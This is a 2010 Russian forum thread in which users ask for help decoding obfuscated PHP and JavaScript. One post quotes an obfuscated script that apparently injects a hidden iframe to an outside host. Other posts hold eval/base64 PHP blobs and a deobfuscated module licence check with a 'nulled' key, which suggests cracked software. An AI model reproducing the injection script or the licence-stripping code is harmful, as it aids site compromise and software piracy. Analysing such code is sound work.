ZuFUuuGs9YasMUKOP/QGMSrac/s7FsEGBZxn7uXUvXxaCUWGZ/kUPYDn7IZG7+77COkx7IYs3/QGHuUG7a+xMPVUvUaJ53mX3u/s7ZT9DmHau0MOMZ8Quyz9mIKsZ3g9cjhsmOiQ705aTm5sFsgaZ 3kdCh+2HI0nPuWXCOvUCj2jFYXGD44JCO8sEZaGQ3+jF3vdMJg nu0zsM/vhH4F77Z4XHj57FUmGHOrjCONQHuk9QZmxHO4x7Sha5uEXm3Ta PXUnu48UmHZauZvXMuWlZOVnP38xCSchZ/rsMZcOPOQGu4YhT4Ed3/UZF/2lm/uxE3uXMYIsCI/aQ/s2FMHdDUeJrfMs9/1QF4kXcagaPOe9mjgs7XSsZs8nKXZRMZ0R5Um7BXEJ3kBJM3Rh 5PVjMXRx5499ZXXQM+rxDOWGCLVXu4RZDL1stpFnDuZUPpUOCo 1J9LEsZ4kxtpNJuOR7BkZOH3rG5/uJc/+xP4RjDuss9SZXtSXdmXTsHXMG9mEsCpZsMZWaK42Uu/nh3/sd7/vGvkxx5kkU3X1JPuvs9jxUHXShZJFZQ/BXPH7aDUe73ZGX3Ohs9j7xCSvs9S5xB/Bs9j/UHX09mIism38lD/TaHukGCm+QCeV7vkxd9+f9mUzs9jSXcUs9PjxQ7ZUs74IjFjxs M4nG7X8XHOPJckAdmpxOus8XM3rlZ3GaBuZs7+kUZ3k7mjUamZ NU7a+UD/Gs9SEUDpvhCjBx94YaKImU53Y93OEs9pKQ74E7Ejvh3hY77+Ql 34TdZ/a77j8UTkU79X/UHZuUTXgsm+UZKjXavaYZ3ukXmP5sv3x77U9UvjBsHZfJc3rRH IUhFHDdC4KU7/vXF4IXMukUTkinrft2Gmq

Kaimi

20.03.2010, 18:50

http://pastebin.com/2LN2swim

qwwertty

20.03.2010, 18:51

http://pastebin.com/2LN2swim
СПАСИБО

gun15

22.03.2010, 13:27

Помогите рашифровать.

Вот весь файл __http://www.sendspace.com/file/neutf8

Тут кусок кода

<?php $_fl0="1.7.\060.2"; if (!class_exists("\113\157olS\143\162ip\164\151ng",FALSE)) { class koolscripting { static function start() { ob_start(); return ""; } static function end() { $_fO0=ob_get_clean(); $_fl1=""; $_fO1=new domdocument(); $_fO1->loadxml($_fO0); $_fl2=$_fO1->documentElement; $id=$_fl2->getattribute("\151d"); $name=$_fl2->nodeName; $id=($id == "") ? "\144ump": $id; if (class_exists($name,FALSE)) { eval ("\044".$id."\040= \156\145w ".$name."\050'".$id."');"); $$id->loadxml($_fl2); $_fl1=$$id->render(); } else { $_fl1.=$_fO0; } return $_fl1; } } } function _fO2($_fl3) { return md5($_fl3); } function _fO3() { $_fl4=_fO4("\134","\057",strtolower($_SERVER["SCR\111\120T_N\101\115E"])); $_fl4=_fO4(strrchr($_fl4,"\057"),"",$_fl4); $_fl5=_fO4("\134","/",realpath("\056")); $_fO5=_fO4($_fl4,"",strtolower($_fl5)); return $_fO5; } function _fO4($_fl6,$_fO6,$_fl7) { return str_replace($_fl6,$_fO6,$_fl7); } class _fi10 { static $_fi10="\1730}\173\061}<d\151\166 id\075'\173\151\144}'\040\143la\163\163='\173

daniel_1024

22.03.2010, 20:01

что это такое ?
<script>rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342 E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().co ncat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D7 3207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F7 2666D613E65']));</script>

Pashkela

22.03.2010, 21:16

Komyak

23.03.2010, 18:05

Помогите расшифровать. Файл под зендом, я его расшифровываю, но в итоге дефайны, префиксы и т.д. превращается в "кракозбры":_http://upwap.ru/800071

var $aDefFilesUpload = "Р’РєР»СЋС‡РµРЅРЅРѕ";
var $aDefMySQL = "РЈСЃС‚Р°РЅРѕРІР»РµРЅ";

d_x

23.03.2010, 18:39

var $aDefFilesUpload = "Включенно";
var $aDefMySQL = "Установлен";

Это не шифр, смени кодировку отображения на UTF-8 просто.

Komyak

23.03.2010, 20:03

Это не шифр, смени кодировку отображения на UTF-8 просто.
Он у меня после дезенда таким получается. Пробовал открывать и обычным блокнотом и ++ но везде одна Х.

d_x

23.03.2010, 20:26

Ну я же расшифровал...
Как я сделал:
открыл блокнот++, создал новый файл, выбрал кодировку ANSII, вставил твои две строки, нажал "Кодировки" -> "Кодировать в UTF-8".

Komyak

23.03.2010, 20:35

Ну я же расшифровал...
"И смех и грех..." Я нажимал Преобразовать, а не Кодировать. Спасибо, научил блокнотом пользоваться =))

Alex$09

24.03.2010, 15:38

Помогите плиз...

eval(gzuncompress(base64_decode('eF51UE0LgkAQ/Ssdgk2IKBVDwkMd2g59oIHVRoi6VpBWFCL26+tNH0S5lzezO2/evJk6H88G/fF8zYKOqetdw7JMM2Abp3+5hGUjCq+JZQYyiU8yaTBWazGRAdO rcB2Hac0fRrhAtVNEHNE+CBexion/2PDKGAm3gbd/lsgek3y7kEtvu9JJM5fcz5HJ0aRC96sDpEfXs0PB5kOw2rQZQO n3qUsOColAjqCNBxVUM1B7X823j+LlDPDZia7wpQQcTchMpet2 9f3REBnAQRpl3pmuvHMUOlTN/L3g3lnNCpfTrSBvack0rXcHqSeb4A=='))); ?><? eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OIt 7S0NDa0sLQw0VDJ1KxWSbR1LCpKrNRQV9dRDzYwsAVSPkZ+GZF GGTk+RiUlPnlBJcmOthBhw7Ioj7BiH6OcbJ9cr4KkdLBwFLosU BNCllhNUQVJ7mFVPuUQYajeTBN8imDCeU75YBdqWhellpQW5Sk kJRanmpnEp6Qm56ekaqgkRqtkxmpa1wIAgJFM9A=='))); ?><? eval(gzuncompress(base64_decode('eF6FklFvgjAUhf9KR 0ykiQFaEGGEbS4jxsRpgsteDGkMQiRBYAjxwfDfVyhO3Cx7orT 39Lun94Rl4hdRmoD4kO4IUUR4HtQrxX4ZzBar1+livRkSpGE8U XVd08jQ2yieKOyLInuUZT9NAr+Qvk7bPJPy8vKf7bPnMo/tAVk77qfjbtiHLKfvjidAKwpFRgG2DYq8DFoqsrlQ5InENE0VG aahiQocsQvYXTwR9hgHjTpaBOEDxYbb+Ei5fJuqJzrL2XzpkLe 5C6TODbilI2jx5ZonuqvVxx+xSsU8zfjGpAZhH0DnAMbX7vKgK POkeWGrCqjfc7vTmLeqqmoqcc+wJxyKTntrxCp/ZsaNnQm8Dh4/MS2de5SEaX6wf/LHGr0UqqwQ/19YR+l3bcf4HXktZbtt/DS+FZPzDAY1ddpHcSA2Twposlg/454oK20s6wGf+/KLUBcryFRUxnJIcUeZUQS4TXYtkcJBpzWzPgJ3j5DSkBM/LnfBfWMIQSC14pt9TB3T4HwDh/Uxkg==')));

eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5Wj ze0NDA1tzAxM7CMV4+1dSwqSqzUSEosTjUziU9JTc5PSdVQTzJ 2yknKDSpITre1VdfUQZNVV9BTT84Ny4hyx6UiMcIvLco9p1JdU 9MaAMMWJS8='))); ?><? eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OIN zQwMTcwMbUwN9dQydSsVkm0dSwqSqzUUPcxMiyL8ggr9jGKKkh yD6vyKbe1VddR90mHUJkmYAqHImOvnMjwoJzkTNPyRA9HW3VN6 6LUktKiPIWkxOJUM5P4lNTk/JRUDZXEaJXMWE3rWgAtcyvZ'))); ?><? eval(gzuncompress(base64_decode('eF7LTNNQycxLyy/K1axWSUktijewVXH38Xdy9AmOVo83tDQwNbcwMTOwjFePjTaI1 Qjy9w+Jd/EMUtCLNzQwMTcwMbUwN9cw0NS0Ls/IzEnVSEvMKU5VULS11QAbZojbMMNYiBKgXs3qTKArcCk0QrZVS T83P6U0Rz8NaFmxPsQOJc3EvBSofUCrFZBdZgiSU8AuZwS2OS8 5pzQlFYfHjDUV9KCaUcRNgB6ura0FAD0oVW8=')));

<? eval(gzuncompress(base64_decode('eF6NU00LgkAQ/SsdglWIMIsWCQ92qIsQfRyyCLH0VBLYqX59vFk/VnR3vcwu7ps3b96M4224Wwfh8cri2Zxzz+MOj9nND4oi+Vr35J MtF3GaPd5pZrEo3/wup8g5s9GUuYdX5HpPXC9732f2RIUukf0o5HeQ+NjPiRegcUpK iKVRg0OZjYB6lOMgUl1iUqlsKTQgBT8pESoRh/SWN6r0nkV1D/IscPEQ1D3gteW0YXqVy8PQJbKahUlF3SkulX6jP2ZvZFTJqUeS gwjEKxxUqiDVtEciu7s/uGg3XdqKKrv2TNd9Z3r6vohbbAc5PKiGvLelutoZTW89fxb1J0 +BmKmuvfoDM3k4zg=='))); ?><? eval(gzuncompress(base64_decode('eF7tVEuP2jAQ/it7QAKkHjAQWrTiwIo8oHKyG5w4SVWtTJwF8gIBKyBV/3vjR4C0K1XVquqlp4lnxvM9xvDymoeH9Sa/ewbg4wB0h586g1Zj3f7WIKPxbkfOraZXqEcLjU8wXvbNYvbS/NDEy9GoDAt8Kq4nB3WGZfDd8ES7U5axi3SHU3X4+MQb/MKcR9g0LG/DjjgD+/DIKzj1WbBEH+3avpMFAYxTEKgUU2xPEepUd8pQXRPAbpz2Am01 D9LkbHkOSwVjXrFBAK6nucpnSDY4oXoZoLa1H8VwPp9/LQyTuHHCyQgoOQJrswyjqULFDMaO9dQJXkSpwyucsGVmMJn4QB yRlciVnyIp0EtNb2NKaQLEzd1ESBtWCm5dVdg43TUW4lKU2dMy XLhexQoCFu6Li0sW2A7KAGXN40jM0qufFehP/GGlX4pn+sWXW2g9dkpChYDSeWmDXAnjDraYM1FIJbzJHTakWol arW98+xIcVNvw9ZXeWmHw1xeoK7MGy7Ol7fvAoXtmFLq8ikALQ djVPFP0h8sa24oqS7E1lVQlz1suSci3Fj8Q+TthdIvxUdbRZGY RLTkT/QRhbneQrsypbj7IB4Im0xNNt1M3NyHMTjukg8+hPsur95NcrK5 18kG1Tt9ZzaFuqoteAGGidP0MYJLZE9NbJTAJFL8DQYRtZOHtG sbuHiPTpuVvlhj0CaZlvdtRostSa2CsGpsz6qaHheH8wuWPy3+ R6m8cfM8q3le+ofHG3+7/1L9Kte930eF1l98tyD4a9J9pFG5o1GqQL4311/b99x8IkiJq'))); ?><? eval(gzuncompress(base64_decode('eF591bFqxDAMgOFX6 XBwCZQSybIkUzpcly4HHToe4egr3Na3vy6Fyx+q0U6k+LNs5fB x/nw/nb8uV5Fw0ZGLT8u8vp1ut++f6fD3+HiVFjFGLHE9rpdlnR4DZH 56eRwrxg1jm+fn/1LLNnVHqBehug2N4tW2fTXxlYGxLJyQIrlhd7gdwv0Q4wTZ4pw ITtAgROhSrLlv16y7kmoR7AimT+lT+pQ+pU/pU/pa5YvtEht9bXdmW5EtkY2+Rl+rzu1ANtIb6Y104/k0+ow+213K8lbixhuBxgIaFUaFUdGrAgobA4Wdwk5hZ5k6FZ2K TkWnoo9q0WhJzjo5FU6FU+FlndDYfNc/KXQKnUIvhWh2QWFQGBRGddMEjSlYw6AwKAwKI6sPopkFT2lSmB Rm1SsFnShZ3yzri86T1Cf1Wf0GBa0nWfukflR3VNElBndm/O7M/HoHl+/WIw=='))); ?><? eval(gzuncompress(base64_decode('eF5l0bEKgzAUheFXc RBMoENuorkG6WCXLkKHjkFCEQuCpBB0KKXv3qUOHqfL/00H7nONwzK9YjbP0zDGYdxuCErkm/1JyQ8SnduUHm8RiNiSdrWywhl52nUJXUFbaIauod2+SSkEQtAI BqFEqBAsAiPUCLiUcCnhUtJSNmlc1hSz/NrdLm1390Ugw+wcKw5F7zX1h9+QP3yrl833BzJCd6g='))); ?><? eval(gzuncompress(base64_decode('eF6lVl1ro0AU/StpyYODxTozjmNW3N0uG0qhm0C69CUEKa7SsEGzrmEfgv+9M9q QifOhdg0qSrjn3HPvudfskCfVtsgnu902SfMkPd3jGFrgOD29f X+Joq/T+8flt7vHp3UMIfUhmgWub0GIwWZdFof8l+WCjXX9WlX7T7e3S ZGnSeX8+fdS7p3ycHrev+6/HMpdNI2f5qvn+Wrd3uLF3Y/55hqE28ySkCdRNKnKQyqTwpGGk3fmZLsO4SfjJmfqWifm4EbCb dmoAcgFgH8+qPmRsZCSuDHwsiEA4IoJkL3s/jIFdEXwBT6Q/xjQfHH/sJjH3x9WE8cE4Tpe91TIgUGoA6dd8AZ+tVz+7AeHrDrs5IDq4I EYXNCSmp7MxbaRjZis+oRmAiZq/j00HaJWbrCbkCtCO/h8mJ560n3X+Ky1TMjTOAlBgY9ne33CDmas9JtOFCSSYEl4jZ2H VYSTlsE8ENYpc9RRa3EkzDWb2MMBkYNI58KbTRpeWsnF4UVYtm REttDl1W1TG9504jSDqLfGlHQuozpKHFWYK3R56UH3bV/dO/U2z4q4+C3NV17qus706w4p1h3RakUvDBp0z+GVwirVfJ1qwYVq lHQuPapRm3I0xXYlnyUK4CiHYp8EbVcpQvhSCDI6BN/xiihtI2ti1SzQlUYucYIHdjBiG1LmOOq0ltUOByyOab7/BhadU+GBlU0YmrM1dDC2tF8GWBzgcER7Ng1jAvXG2AaLI5zv16 E0gjEuweLM5qvUaIoZq/SsXYcfNwb+f2MYQ4w0RhOrVhYrfAPIa62j'))); ?>

Kaimi

24.03.2010, 16:02

Чуть почище
http://pastebin.com/1h12EUfJ
http://pastebin.com/j8rqvPBR
http://pastebin.com/wwvpV9FU

Alex$09

01.04.2010, 14:13

Расшифруйте плиз:
<?php /* by ТорЧ */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O OO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7 }.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO0000 00{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14}.$ OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8 }.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO0 0000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$ OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$O O00O0000=2600;eval($OOO0000O0('aWYoITApJE8wMDBPME8 wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwM E8wMCgkTzAwME8wTzAwLDEwMjQpOyRPME8wMDBPMDAoJE8wMDB PME8wMCw0MDk2KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PT zAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsNTQwKSwnSGI 2Tjl4U21LZ1EzcWxrWlhkcEJSc0RXd3V6RU8xL0lMaG8yVThHd FZ5WWk3anZQNXJNZStDQW5mVDRGY2EwSj0nLCdBQkNERUZHSEl KS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0d XZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk 7'));return;?>
1AhyESRV1S8jupLyZ29MkNLeqBH+qNHyuS88Q6IdckFYKkB84I mMfv2JKkm8c/JifZ3jFvZvKkevTZZiJMNVcIQf4ofLevm5fZ3VcvWrJ6NYKZNL TJNLf/FMa02YcM5L402hFoNoKS82OBVLlNLrqBLAl2KMgMUFg9aZqNbZ qNbZqNC8OGstWng8OSrhwARVgCaIdU8qdsaIgM5ogMKvg9aZBe bZq9c5q6fogMK7g9aZBeH5qNbZq6LUB+aZqNH5qNbZQ6dZq9c5 q9aZqNHVg9c5qNbZq9c5q65UB+c5q9c5qNH5Qp5tpSKAB28fRA C3uC9eODriD8hUO9gpO+dW1ns4dRcr3+8qzScMsBhm1xuTDDUn ztuXlWglupjNXDTGsNdSwA95p2+t361bXUl9dRump98Qp+rlBU aXRsgBsxsDsChuDGxowAd8uG1VzDyiESCvEnbrOtl+1Wun/m84qN9MqeXCl2Ofkp7PgMUyQBjGwArPOARVg9c5qNbZq9c5q6U FuWuhE6LUB+c5q9c5q9c5QB7=NXyHuWgMEngIOGs5Eng+zDTtQ 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

<?php /* by ТорЧ */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O OO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7 }.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO0000 00{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14}.$ OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8 }.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO0 0000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$ OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$O O00O0000=1712;eval($OOO0000O0('aWYoITApJE8wMDBPME8 wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwM E8wMCgkTzAwME8wTzAwLDEwMjQpOyRPME8wMDBPMDAoJE8wMDB PME8wMCw0MDk2KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PT zAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsNTQwKSwnSGI 2Tjl4U21LZ1EzcWxrWlhkcEJSc0RXd3V6RU8xL0lMaG8yVThHd FZ5WWk3anZQNXJNZStDQW5mVDRGY2EwSj0nLCdBQkNERUZHSEl KS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0d XZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk 7'));return;?>
1AhyESRV1S8jupLyZ29MkNLeqBH+qNHyuS88Q6IdckFYKkB84I mMfv2JKkm8c/JifZ3jFvZvKkevTZZiJMNVcIQf4ofLevm5fZ3VcvWrJ6NYKZNL TJNLf/FMa02YcM5L402hFoNoKS82OBVLlNLrqBLAl2KMgMUFg9aZqNbZ qNbZqNC8OGstWng8OSrhwARVgCaIdU8qdsaIgM5ogMKvg9aZBe bZq9c5q6fogMK7g9aZBeH5qNbZq6LUB+aZqNH5qNbZQ6dZq9c5 q9aZqNHVg9c5qNbZq9c5q65UB+c5q9c5qNH5Qp5tpSKAB28fRA C3uC9eODriD8hUO9gpO+dW1ns4dRcr3+8qzScMsBhm1xuTDDUn ztuXlWglupjNXDTGsNdSwA95p2+t361bXUl9dRump98Qp+rlBU aXRsgBsxsDsChuDGxowAd8uG1VzDyiESCvEnbrOtl+1Wun/m84qN9MqeXCl2Ofkp7PgMUyQBjGwArPOARVg9c5qNbZq9c5q6U FuWuhE6LUB+c5q9c5q9c5QB7=NXyHOAseOA8PE8ae1SxM16Lyk 5+QXSsMOGaMWng8OSaM1S8vuMLnQB7l6UbyEG8IOAs+Q61UzWl 5ESxTWAsMOGaMOMO71mgCupUFNXyHzDTyWnl816LtzmdjExa8O tgPOtqt3SuhEml8QB7l6Gd8uG8vupLtd9xRXRrgdUsxBU1gBUR t3mdM1DRyk5+QuSsGzDT8Q61pB+aRW+dgRoO7gMfv3MfvgMUFN XyUuDuyEGRVg+skd+8kdsa9psKt36Ov3oOyk5+QzDT2EmsUupb xBU1gBUsId98p3oOPuSx+wpa2EATGzDOvOSh5ge7l6UbVuDxUu WKVKUhRsxHPqpf5KNK5q6bZpMKyk5+QXSh8wDd8OoLopxdRR6c r329Lq2H5K9a3KoUFNXyHzSshuSsMQ6gNwDlVupCNEAT+OGa7k obvEMC2wDlVup5LEWse16CMuWuhES8UwWd836bjwWLjwD18ZBH oQB7l6UbVuDxUuWKVKUsfOS8MuWq4KNHoQB7l6UbVuDxUuWKVK 8bMwD1jwBVLEGcjwAx2zSRoQB7l6UbVuDxUuWKVKUlPEtd8EtX j1m85uBVL1Ssf16a2OnqFKSlVwWgeuWXaKofUwAavuG8tDM12z SxMOAs+gC+yk5+Qgmu8OtlyEAfLZpHoqof5329ok5+Qgms5uSx +upHaK9bGzDr8WA181xa2EAT+uDT+OMLozmd+ONVP3n1n1MT4u Dae3GaMuMTM1paCOSrPwDde3ns5uSx+upT+/mXoQB7l6G8GQ6dCOSdh1SRLZodAuWgezDavQpHUzDTGEMHaK6K cuGav16b2EArPO2CMuDX0fP7L4ZmPFvPcTJZ8cvRLcJmMfZN8f P2eJoNoTINr4ZfLFkFUc0PJ36N5T/ivFkWjTZZ8cPmJKk3FF0FiF/2MJ6Nvf/nvfvP8F/28Z6aGEAT+ZoKFNXy8Eml8zDwVgms5uSx+upHaZpHU1GsMOA8P EoULgS8vuGcLZpHoZSuPEtXLwAa7EnKaung8uDf0fP7L4ZmPFv PcTJZ8cvRLfkiMc0NiJkneJoNhTImP40NMFIZ0Kkne4F2jcJfL fvW5c/20KkevTZZiJM5Lc/P8Tk2MTpNtf6Nvf/nvfvP8F/2JFkLc3AuPEtX0K27l6Gs7OAsyuoLU1WbUwWd8KN+aK6KoQpbF gms5uSx+upHaK6Kj3pKFgS8vuGcLZpHoF/RLc0BL40FrJ6NPFvBY4JFn4Z3rJMNYKZZUfkP8F/nvFZqLc/W5fvW5cM5LF0FocvF54Z38KkJvFJPM4PqLF/W7F/F2FoNPFvIUF/W8K2jaNXy8Eml8zDwVgms5uSx+upHcgmu8OtlyEAfyK6dyEGuP KN+LK2rGEAT+KSlPESaMZWg8uNFo0MNVc/Jv4Jetc0WMTpNjT/FPckWUT/P8F/neJoNoTINr4ZfLFkFUc0PJ36NecI3LF/Fo4Z38KkJvc/P8Tkn0JoNoTINr4Zfc3AuPEtX0K27l6GdyupLoZSdy1obe1m87 uBCOKGghwAjtOGaCEGX4KSryuAh+/Ds7ESankAgPOGd8O2VrOmLLuSa+1SsUKmgtwoLrkBH7qBU53N9 Tq6UFOSxUuS8vueVLlWbfkAChOG1yEoC+EnH4KN15/NjOK2FZFPmiT/BjJJcLfvW5c/2JkoHo3odCOSdh1SRvKoHVKofUzDTGEMfoQB5PuS8AZoKyk5+Q

Kaimi

01.04.2010, 14:49

<?php
@error_reporting(7);
@ini_set('display_errors',true);
@ini_set('html_errors',false);
define('DATALIFEENGINE',true);
define('ROOT_DIR','../..');
define('ENGINE_DIR','..');
define ('DАTALIFEENGINE',truе);
include ENGINE_DIR.'/data/config.php';
include ENGINE_DIR.'/data/pingdata.php';
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$IIIIIIIIII1I['charset']);
$IIIIIIIIII1l = explode('.',$_SERVER['HTTP_HOST']);
$IIIIIIIIIlII = count($IIIIIIIIII1l) -1;
unset($IIIIIIIIII1l[$IIIIIIIIIlII]);
if (end($IIIIIIIIII1l) == "com"or end($IIIIIIIIII1l) == "net") $IIIIIIIIIlII --;
$IIIIIIIIII1l = $IIIIIIIIII1l[$IIIIIIIIIlII -1];
$IIIIIIIIII1l = md5(md5($IIIIIIIIII1l ."92347236"));
$IIIIIIIIIllI = nulled;
if(strlen($_POST['name']) != 6){
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;\"><font color=\"red\">Длина ключа должна составлять 6 символов!</font></div>");
}else if($_POST['name'] != $IIIIIIIIIllI){
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;\"><font color=\"red\">Модуль не активирован</font></div>");
}else if($_POST['name'] == $IIIIIIIIIllI){
$IIIIIIIIIlll['key'] = $IIIIIIIIIllI;
$IIIIIIIIIll1 = fopen(ENGINE_DIR .'/data/pingdata.php',"w");
fwrite($IIIIIIIIIll1,"<?php\n\n// pingationMod configurations\n\n\$pingdata = array (\n\n");
foreach ($IIIIIIIIIlll as $IIIIIIIIIl11 =>$IIIIIIIII1II) {
